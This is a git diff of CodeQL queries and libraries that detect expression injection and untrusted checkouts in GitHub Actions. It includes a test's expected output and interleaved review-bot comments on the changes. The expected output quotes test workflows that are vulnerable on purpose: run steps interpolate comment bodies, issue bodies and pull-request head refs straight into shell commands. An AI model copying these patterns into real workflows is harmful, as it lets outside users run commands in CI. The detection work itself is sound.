+ * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. `${{ steps.changed-files.outputs.all_changed_files }}` + */ +class StepsExpressionImpl extends ContextExpressionImpl { + string stepId; + string fieldName; + + StepsExpressionImpl() { + expression.regexpMatch(stepsCtxRegex()) and + stepId = expression.regexpCapture(stepsCtxRegex(), 1) and + fieldName = expression.regexpCapture(stepsCtxRegex(), 2) + } + + override string getFieldName() { result = fieldName } + + override AstNodeImpl getTarget() { + this.getLocation().getFile() = result.getLocation().getFile() and + result.(StepImpl).getId() = stepId + } +} + +/** + * Holds for an expression accesing the `needs` context. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. `${{ needs.job1.outputs.foo}}` + */ +class NeedsExpressionImpl extends ContextExpressionImpl { + JobImpl neededJob; + string fieldName; + + NeedsExpressionImpl() { + expression.regexpMatch(needsCtxRegex()) and + fieldName = expression.regexpCapture(needsCtxRegex(), 2) and + neededJob.getId() = expression.regexpCapture(needsCtxRegex(), 1) and + neededJob.getLocation().getFile() = this.getLocation().getFile() + } + + override string getFieldName() { result = fieldName } + + override AstNodeImpl getTarget() { + this.getEnclosingJob().getANeededJob() = neededJob and + ( + // regular jobs + neededJob.getOutputs() = result + or + // reusable workflow calling jobs + neededJob.(ExternalJobImpl) = result + ) + } +} + +/** + * Holds for an expression accesing the `jobs` context. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. 
`${{ jobs.job1.outputs.foo}}` (within reusable workflows) + */ +class JobsExpressionImpl extends ContextExpressionImpl { + string jobId; + string fieldName; + + JobsExpressionImpl() { + expression.regexpMatch(jobsCtxRegex()) and + jobId = expression.regexpCapture(jobsCtxRegex(), 1) and + fieldName = expression.regexpCapture(jobsCtxRegex(), 2) + } + + override string getFieldName() { result = fieldName } + + override AstNodeImpl getTarget() { + exists(JobImpl job | + job.getId() = jobId and + job.getLocation().getFile() = this.getLocation().getFile() and + job.getOutputs() = result + ) + } +} + +/** + * Holds for an expression the `inputs` context. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. `${{ inputs.foo }}` + */ +class InputsExpressionImpl extends ContextExpressionImpl { + string fieldName; + + InputsExpressionImpl() { + expression.regexpMatch(inputsCtxRegex()) and + fieldName = expression.regexpCapture(inputsCtxRegex(), 1) + } + + override string getFieldName() { result = fieldName } + + override AstNodeImpl getTarget() { + result.getLocation().getFile() = this.getLocation().getFile() and + ( + exists(ReusableWorkflowImpl w | w.getInput(fieldName) = result) + or + exists(CompositeActionImpl a | a.getInput(fieldName) = result) + ) + } +} + +/** + * Holds for an expression accesing the `env` context. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. `${{ env.foo }}` + */ +class EnvExpressionImpl extends ContextExpressionImpl { + string fieldName; + + EnvExpressionImpl() { + expression.regexpMatch(envCtxRegex()) and + fieldName = expression.regexpCapture(envCtxRegex(), 1) + } + + override string getFieldName() { result = fieldName } + + override AstNodeImpl getTarget() { + exists(AstNodeImpl s | + s.getInScopeEnvVarExpr(fieldName) = result and + s.getAChildNode*() = this + ) + } +} + +/** + * Holds for an expression accesing the `matrix` context. 
+ * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. `${{ matrix.foo }}` + */ +class MatrixExpressionImpl extends ContextExpressionImpl { + string fieldName; + + MatrixExpressionImpl() { + expression.regexpMatch(matrixCtxRegex()) and + fieldName = expression.regexpCapture(matrixCtxRegex(), 1) + } + + override string getFieldName() { result = fieldName } + + override AstNodeImpl getTarget() { + exists(WorkflowImpl w | + w.getStrategy().getMatrixVarExpr(fieldName) = result and + w.getAChildNode*() = this + ) + or + exists(JobImpl j | + j.getStrategy().getMatrixVarExpr(fieldName) = result and + j.getAChildNode*() = this + ) + } +} diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 8cd640ace09..f3785eada37 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -80,7 +80,7 @@ module Completion { } module CfgScope { - abstract class CfgScope extends WorkflowNode { } + abstract class CfgScope extends AstNode { } class WorkflowScope extends CfgScope instanceof Workflow { } @@ -215,7 +215,7 @@ private class StrategyTree extends StandardPreOrderTree instanceof Strategy { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | - child = super.getAMatrixVar() and l = child.getLocation() + child = super.getAMatrixVarExpr() and l = child.getLocation() | child order by 
@@ -224,15 +224,14 @@ private class StrategyTree extends StandardPreOrderTree instanceof Strategy { } } -private class JobTree extends StandardPreOrderTree instanceof Job { +private class JobTree extends StandardPreOrderTree instanceof LocalJob { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | ( child = super.getAStep() or child = super.getOutputs() or - child = super.getStrategy() or - child = super.getUses() + child = super.getStrategy() ) and l = child.getLocation() | @@ -261,7 +260,7 @@ private class RunTree extends StandardPreOrderTree instanceof Run { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | - (child = super.getInScopeEnvVarExpr(_) or child = super.getScript()) and + (child = super.getInScopeEnvVarExpr(_) or child = super.getAnScriptExpr()) and l = child.getLocation() | child @@ -271,10 +270,10 @@ private class RunTree extends StandardPreOrderTree instanceof Run { } } -private class StringValueTree extends StandardPreOrderTree instanceof StringValue { +private class ScalarValueTree extends StandardPreOrderTree instanceof ScalarValue { override ControlFlowTree getChildNode(int i) { result = - rank[i](ExpressionNode child, Location l | + rank[i](Expression child, Location l | child = super.getAChildNode() and l = child.getLocation() | @@ -289,6 +288,6 @@ private class UsesLeaf extends LeafTree instanceof Uses { } private class InputTree extends LeafTree instanceof Input { } -private class StringValueLeaf extends LeafTree instanceof StringValue { } +private class ScalarValueLeaf extends LeafTree instanceof ScalarValue { } -private class ExpressionLeaf extends LeafTree instanceof ExpressionNode { } +private class ExpressionLeaf extends LeafTree instanceof Expression { } diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 7cfde2a6f9f..fddf537ed1d 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll 
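Review bot: `ScalarValue` ends up with two control-flow tree classes in Cfg.qll, `ScalarValueTree` (a `StandardPreOrderTree` whose children are its `Expression` child nodes) in the `-271,10` hunk and `ScalarValueLeaf` (a `LeafTree`) in the `-289,6` hunk, and neither hunk says which one is meant to apply. The rename carries the overlap over from `StringValueTree`/`StringValueLeaf`. If a scalar with embedded expressions is meant to be a pre-order node, the leaf class looks redundant and could be dropped; otherwise a comment such as `// scalars without expressions are leaves; ScalarValueTree adds the expression children` would record the intent. How the shared CFG library treats a node that is both is not visible here, so it is worth confirming with a CFG test over a `run:` step that contains an expression.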
+++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -38,7 +38,7 @@ predicate runEnvToScriptStoreStep(DataFlow::Node pred, DataFlow::Node succ, Data c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output\\.", "")) and r.getInScopeEnvVarExpr(varName) = pred.asExpr() and exists(string script, string line | - script = r.getScript().getValue() and + script = r.getScript() and line = script.splitAt("\n") and ( output = line.regexpCapture(".*::set-output\\s+name=(.*)::.*", 1) or diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 65e2abaa6c6..52c2ae6a483 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -243,7 +243,7 @@ predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) { /** * Holds if there is a local flow step from `nodeFrom` to `nodeTo`. * For Actions, we dont need SSA nodes since it should be already in SSA form - * Local flow steps are always between two nodes in the same Cfg scope (job definition). + * Local flow steps are always between two nodes in the same Cfg scope. */ pragma[nomagic] predicate localFlowStep(Node nodeFrom, Node nodeTo) { diff --git a/ql/lib/ext/actions_github-script.model.yml b/ql/lib/ext/actions_github-script.model.yml index df5b1f70ae5..2ed2e03a34e 100644 --- a/ql/lib/ext/actions_github-script.model.yml +++ b/ql/lib/ext/actions_github-script.model.yml @@ -4,6 +4,3 @@ extensions: extensible: sinkModel data: - ["actions/github-script","*","input.script","expression-injection"] - - - diff --git a/ql/src/Debug/partial.ql b/ql/src/Debug/partial.ql index fbdf9ca7daa..fb31fe20990 100644 --- a/ql/src/Debug/partial.ql +++ b/ql/src/Debug/partial.ql 
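Review bot: The `set-output` pattern kept as context in the FlowSteps.qll hunk, `.*::set-output\\s+name=(.*)::.*`, captures the output name greedily, so a line whose value itself contains `::` yields a name that runs up to the last `::` and the stored field no longer matches the real output. A reluctant group, `line.regexpCapture(".*::set-output\\s+name=(.*?)::.*", 1)`, stops at the first separator and keeps the env-var-to-output step from being silently lost for such lines. The predicate continues outside the hunk, so any alternatives after the trailing `or` should be checked for the same greedy group.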
@@ -15,7 +15,7 @@ import PartialFlow::PartialPathGraph private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource and - source.getLocation().getFile().getBaseName() = "argus_case_study.yml" + source.getLocation().getFile().getBaseName() = "test.yml" } predicate isSink(DataFlow::Node sink) { none() } diff --git a/ql/src/Security/CWE-020/CompositeActionsSinks.ql b/ql/src/Security/CWE-020/CompositeActionsSinks.ql index 096c19b48d0..1f90efa5bcc 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSinks.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSinks.ql @@ -18,7 +18,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(Run e | e.getScript().getAnExpression() = this.asExpr()) or + exists(Run e | e.getAnScriptExpr() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql index 040251045c8..d84566dab04 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql @@ -18,7 +18,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(Run e | e.getScript().getAnExpression() = this.asExpr()) or + exists(Run e | e.getAnScriptExpr() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } diff --git a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql index 590660ce63b..fd4f03e1edd 100644 --- a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql +++ b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql 
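Review bot: The private class `ExpressionInjectionSink` is defined identically in CompositeActionsSinks.ql (this hunk), ReusableWorkflowsSinks.ql, CriticalExpressionInjection.ql and ExpressionInjection.ql, and the commit has to make the same `getAnScriptExpr()` edit four times. Because the sink set decides what each of these queries reports, a copy missed in a later change would make the queries disagree without any error. Moving the class into one library module under `ql/lib` and importing it from the four queries would keep them aligned. The class also has no QLDoc; a comment such as `/** An expression in a run script, or a sink modelled as "expression-injection". */` would state what counts as a sink.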
@@ -19,7 +19,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(Run e | e.getScript().getAnExpression() = this.asExpr()) or + exists(Run e | e.getAnScriptExpr() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } @@ -44,4 +44,4 @@ where .hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) select sink.getNode(), source, sink, "Potential expression injection in $@, which may be controlled by an external user.", sink, - sink.getNode().asExpr().(ExpressionNode).getExpression() + sink.getNode().asExpr().(Expression).getExpression() diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index 0d0bb39c41e..d59cc07cad2 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -19,7 +19,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(Run e | e.getScript().getAnExpression() = this.asExpr()) or + exists(Run e | e.getAnScriptExpr() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } @@ -38,4 +38,4 @@ from MyFlow::PathNode source, MyFlow::PathNode sink where MyFlow::flowPath(source, sink) select sink.getNode(), source, sink, "Potential expression injection in $@, which may be controlled by an external user.", sink, - sink.getNode().asExpr().(ExpressionNode).getRawExpression() + sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index db341e0c5cc..865169b3cd9 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql 
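Review bot: The two `select` clauses changed here fill the same `$@` placeholder differently: CriticalExpressionInjection.ql passes `(Expression).getExpression()` while ExpressionInjection.ql passes `(Expression).getRawExpression()`, although the alert text is identical. Unless the difference is intended, both queries should use the same accessor so that a finding reads the same whichever query reports it. What the two accessors return is not visible in these hunks, so which one is preferable should be confirmed against the `Expression` class.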
@@ -19,7 +19,10 @@ import actions * An If node that contains an `actor` check */ class ActorCheck extends If { - ActorCheck() { this.getCondition().regexpMatch(".*github\\.(triggering_)?actor.*") } + ActorCheck() { + this.getCondition().regexpMatch(".*github\\.(triggering_)?actor.*") or + this.getCondition().regexpMatch(".*github\\.event\\.pull_request\\.user\\.login.*") + } } /** @@ -32,7 +35,7 @@ class LabelCheck extends If { } } -from Workflow w, Job job, UsesStep checkoutStep +from Workflow w, LocalJob job, UsesStep checkoutStep where w.hasTriggerEvent("pull_request_target") and w.getAJob() = job and diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index ca481768671..4ef2a2e5875 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected 
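Review bot: `ActorCheck` accepts any `if` condition that merely mentions `github.actor`, `github.triggering_actor` or `github.event.pull_request.user.login`, so a condition that does not restrict who can trigger the job (a negated comparison, or the actor used only inside a string) still counts as a check. If the query uses this class to suppress results, as the name suggests, that would hide real untrusted checkouts. The patterns also rely on `.*`, which does not cross line terminators, while `regexpMatch` has to match the whole string, so a condition written as a YAML block scalar with a trailing newline is not recognised. Both alternatives can be folded into one dot-all pattern, `this.getCondition().regexpMatch("(?s).*github\\.((triggering_)?actor|event\\.pull_request\\.user\\.login).*")`, and the class comment should say that this is a textual heuristic rather than proof of an authorisation check.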
@@ -1,110 +1,21 @@ files | .github/workflows/expression_nodes.yml:0:0:0:0 | .github/workflows/expression_nodes.yml | | .github/workflows/test.yml:0:0:0:0 | .github/workflows/test.yml | -yamlNodes -| .github/workflows/expression_nodes.yml:1:1:1:2 | on | +workflows | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | -| .github/workflows/expression_nodes.yml:3:1:3:4 | jobs | -| .github/workflows/expression_nodes.yml:4:3:4:14 | echo-chamber | -| .github/workflows/expression_nodes.yml:4:3:21:47 | echo-chamber: | -| .github/workflows/expression_nodes.yml:5:5:5:11 | runs-on | -| .github/workflows/expression_nodes.yml:5:5:21:47 | runs-on ... -latest | -| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | -| .github/workflows/expression_nodes.yml:6:5:6:9 | steps | -| .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | -| .github/workflows/expression_nodes.yml:7:9:7:11 | run | -| .github/workflows/expression_nodes.yml:7:9:8:6 | run: LI ... ody }}' | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1e ... 
ody }}' | -| .github/workflows/expression_nodes.yml:8:9:8:11 | run | -| .github/workflows/expression_nodes.yml:8:9:10:6 | run: \| | -| .github/workflows/expression_nodes.yml:8:14:9:57 | \| | -| .github/workflows/expression_nodes.yml:10:9:10:11 | run | -| .github/workflows/expression_nodes.yml:10:9:13:6 | run: \| | -| .github/workflows/expression_nodes.yml:10:14:12:53 | \| | -| .github/workflows/expression_nodes.yml:13:9:13:11 | run | -| .github/workflows/expression_nodes.yml:13:9:16:6 | run: > | -| .github/workflows/expression_nodes.yml:13:14:15:46 | > | -| .github/workflows/expression_nodes.yml:16:9:16:11 | run | -| .github/workflows/expression_nodes.yml:16:9:20:6 | run: \| | -| .github/workflows/expression_nodes.yml:16:14:19:57 | \| | -| .github/workflows/expression_nodes.yml:20:9:20:11 | run | -| .github/workflows/expression_nodes.yml:20:9:21:47 | run: "L ... ody }}' | -| .github/workflows/expression_nodes.yml:20:14:21:46 | "LINE 1 ... ody }}' | -| .github/workflows/test.yml:1:1:1:2 | on | | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:1:5:1:8 | push | -| .github/workflows/test.yml:3:1:3:4 | jobs | -| .github/workflows/test.yml:4:3:4:6 | job1 | -| .github/workflows/test.yml:4:3:40:53 | job1: | -| .github/workflows/test.yml:5:5:5:11 | runs-on | -| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | -| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | -| .github/workflows/test.yml:7:5:7:11 | outputs | -| .github/workflows/test.yml:8:7:8:16 | job_output | -| .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | -| .github/workflows/test.yml:10:5:10:9 | steps | -| .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | -| .github/workflows/test.yml:11:9:11:12 | uses | -| .github/workflows/test.yml:11:9:15:6 | uses: a ... 
kout@v4 | -| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | -| .github/workflows/test.yml:12:9:12:12 | with | -| .github/workflows/test.yml:13:11:13:21 | fetch-depth | -| .github/workflows/test.yml:13:11:15:6 | fetch-depth: 0 | -| .github/workflows/test.yml:13:24:13:24 | 0 | -| .github/workflows/test.yml:15:9:15:12 | name | -| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:15:15:15:31 | Get changed files | -| .github/workflows/test.yml:16:9:16:10 | id | -| .github/workflows/test.yml:16:13:16:18 | source | -| .github/workflows/test.yml:17:9:17:12 | uses | -| .github/workflows/test.yml:17:15:17:42 | tj-acti ... les@v40 | -| .github/workflows/test.yml:19:9:19:12 | name | -| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | -| .github/workflows/test.yml:19:15:19:43 | Remove ... d files | -| .github/workflows/test.yml:20:9:20:10 | id | -| .github/workflows/test.yml:20:13:20:16 | step | -| .github/workflows/test.yml:21:9:21:12 | uses | -| .github/workflows/test.yml:21:15:21:55 | mad9000 ... tring@3 | -| .github/workflows/test.yml:22:9:22:12 | with | -| .github/workflows/test.yml:23:11:23:16 | source | -| .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | -| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | -| .github/workflows/test.yml:24:11:24:14 | find | -| .github/workflows/test.yml:24:17:24:21 | "foo" | -| .github/workflows/test.yml:25:11:25:17 | replace | -| .github/workflows/test.yml:25:20:25:21 | "" | -| .github/workflows/test.yml:26:9:26:10 | id | -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | -| .github/workflows/test.yml:26:13:26:23 | simplesink1 | -| .github/workflows/test.yml:27:9:27:11 | run | -| .github/workflows/test.yml:27:14:27:63 | echo ${ ... 
iles }} | -| .github/workflows/test.yml:28:9:28:10 | id | -| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | -| .github/workflows/test.yml:28:13:28:23 | simplesink2 | -| .github/workflows/test.yml:29:9:29:11 | run | -| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | -| .github/workflows/test.yml:31:3:31:6 | job2 | -| .github/workflows/test.yml:32:5:32:11 | runs-on | -| .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | -| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | -| .github/workflows/test.yml:34:5:34:6 | if | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:36:5:36:9 | needs | -| .github/workflows/test.yml:36:12:36:15 | job1 | -| .github/workflows/test.yml:38:5:38:9 | steps | -| .github/workflows/test.yml:39:7:40:53 | - id: sink | -| .github/workflows/test.yml:39:9:39:10 | id | -| .github/workflows/test.yml:39:9:40:53 | id: sink | -| .github/workflows/test.yml:39:13:39:16 | sink | -| .github/workflows/test.yml:40:9:40:11 | run | -| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | -jobNodes +reusableWorkflows +compositeActions +jobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -stepNodes +localJobs +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +extJobs +steps | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | 
@@ -117,17 +28,17 @@ stepNodes | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -runNodes -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -runExprNodes +runSteps +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | +| 
.github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | +runExprs | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | 
@@ -142,169 +53,156 @@ runExprNodes | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -allUsesNodes +uses | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -stepUsesNodes +stepUses | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -jobUsesNodes -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -usesSteps +usesArgs | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | source | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -runSteps -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| 
.github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | runStepChildren -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:9:7:11 | run | -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1e ... ody }}' | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:9:8:11 | run | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:14:9:57 | \| | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:9:10:11 | run | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:14:12:53 | \| | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:9:13:11 | run | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:14:15:46 | > | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:9:16:11 | run | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:14:19:57 | \| | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:9:20:11 | run | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | "LINE 1 ... 
ody }}' | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:9:26:10 | id | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:9:27:11 | run | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | 